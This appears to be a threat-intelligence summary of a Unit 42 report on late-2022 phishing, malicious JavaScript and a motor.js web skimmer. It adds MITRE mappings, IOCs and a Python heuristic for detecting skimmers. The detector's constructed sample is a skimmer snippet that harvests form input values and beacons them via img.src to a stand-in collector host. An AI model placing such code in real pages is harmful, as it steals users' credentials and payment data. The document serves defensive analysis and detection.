Recent Trends in Internet Threats: Common Industries Impersonated in Phishing Attacks, Web Skimmer Analysis and More

Unit 42 analyzed over 67 million malicious URLs, domains, and IPs observed in H2 2022, highlighting trends in phishing, malicious JavaScript, and web skimmers, including a case study on a Tranco top 1 million site. The report notes concentration of hosting in the United States and other top countries, rising use of CAPTCHA-protected phishing, and provides IOCs such as motor.js and the personallydelivered domain. #PDF.Spam.Heur.1 #Trojan.PDF.Phishing #motor.js #personallydelivered.com

Keypoints

  • H2 2022 featured over 67 million malicious domains and URLs, with about 12 million HTTP requests and 60 million DNS requests per day.
  • Malicious JavaScript activity surged in H2, with 4.8 million malicious JS samples across 4.8 million URLs and 1.6 million hostnames; URLs with malicious JS rose 99.3% vs H1.
  • Phishing impersonation focused on online documents/storage, Internet portals/webmail, and financial services; CAPTCHA-protected phishing and use of SaaS-hosted phishing pages increased.
  • A web skimmer case study covered a Tranco top 1M motor retailer site infected via motor.js, which stole user data including credentials and payment information.
  • Malicious PDFs remained dominant among downloaded files; top VirusTotal families included PDF.Spam.Heur.1 and Trojan.PDF.Phishing.
  • A nontrivial share (4.8%) of malicious domains are subdomains of well-known hosting services, with two hosting services accounting for ~70% of those subdomains.
  • Injected JS threats span JS downloaders, web skimmers, cryptominers, redirectors, and web scams; web skimmers show greater diversity in code and behavior.

MITRE Techniques

  • [T1566] Phishing – Social engineering via phishing pages impersonating services. ‘phishing attacks disguised themselves as online document and storage platforms…’
  • [T1059.007] JavaScript – Injected JS used to collect data from web forms. ‘the top five injected JS malware classes in the last half of 2022 are downloaders, web skimmers, cryptominers, redirectors and web scams.’
  • [T1105] Ingress Tool Transfer – JS downloader activity indicates payload download/installation. ‘JS downloader threats showed the most activity, followed by web skimmers and web miners.’
  • [T1583.001] Acquire Infrastructure – Malicious domains are often subdomains of hosting services. ‘a nontrivial number of malicious domains are the subdomains of well-known web hosting services… two popular web hosting services account for around 70%…’
  • [T1204.002] User Execution – CAPTCHA-protected phishing pages imply user interaction to proceed. ‘There was also an increasing trend of CAPTCHA-protected phishing pages.’
  • [T1041] Exfiltration Over C2 Channel – Collected data is sent to attacker servers. ‘stores the sensitive information in an array and sends information transformed into a string to the malicious server hosted by attackers, with the img.src method shown in Figure 17.’
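
Added example (not code from the Unit 42 report): a small static heuristic in Python that flags JavaScript combining form-value harvesting with an image-beacon request to a host outside the site's allowlist, the exfiltration pattern quoted under T1041 above. The allowlist hosts and both sample scripts are constructed for this example; the skimmer sample is not the real motor.js.

```python
import re
from urllib.parse import urlparse

# Hosts the shop legitimately talks to (assumed allowlist for this example).
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}

# Heuristics for the two behaviours the report describes: harvesting form
# field values, and sending them off via an image request (img.src).
FORM_HARVEST = re.compile(
    r"(querySelectorAll|getElementsByTagName)\(\s*['\"](input|form)['\"]\s*\)|\.value\b")
IMG_BEACON = re.compile(r"new\s+Image\s*\(\s*\)|\.src\s*=")
URL_LITERAL = re.compile(r"https?://[^\s'\"]+")

def find_external_hosts(js, allowed=ALLOWED_HOSTS):
    """Return hostnames found in URL literals that are not on the allowlist."""
    hosts = set()
    for url in URL_LITERAL.findall(js):
        host = urlparse(url).hostname
        if host and host not in allowed:
            hosts.add(host)
    return sorted(hosts)

def assess_script(js, allowed=ALLOWED_HOSTS):
    """Flag a script only when all three skimmer traits appear together."""
    harvests = bool(FORM_HARVEST.search(js))
    beacon = bool(IMG_BEACON.search(js))
    external = find_external_hosts(js, allowed)
    return {"harvests_forms": harvests, "img_beacon": beacon,
            "external_hosts": external,
            "suspicious": harvests and beacon and bool(external)}

# Constructed samples: a skimmer-style script and a benign tracking pixel
# that also sets img.src, but only towards an allowed host.
SKIMMER_SAMPLE = """
var f=document.querySelectorAll('input');var d=[];
for(var i=0;i<f.length;i++){d.push(f[i].name+'='+f[i].value);}
var img=new Image();img.src='https://collector.invalid/gate.php?d='+encodeURIComponent(d.join('&'));
"""
BENIGN_SAMPLE = """
var p=new Image();p.src='https://cdn.shop.example/pixel.gif?path='+location.pathname;
"""

if __name__ == "__main__":
    for name, js in (("skimmer", SKIMMER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, assess_script(js))
```

The benign pixel shows why the verdict requires all three traits: an image beacon alone is common on legitimate pages, and only the combination with form harvesting and an unknown destination is worth an alert.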

Indicators of Compromise

  • [File] motor.js – motor[.]js, and other JS payloads related to the web skimmer
  • [Hash] eaadde9a724180a0318c13a9399ec30bda7a3ec6399ff43b8b7207bf0e74332b – a sample malicious file hash
  • [URL] personallydeliver[.]com/motor[.]js – URL hosting the malicious JavaScript
  • [URL] personallydeliver[.]com/gatemotor[.]php – collection server endpoint
  • [Domain] personallydelivered[.]com – involved domain used in the skimmer ecosystem

Read more: https://unit42.paloaltonetworks.com/internet-threats-late-2022/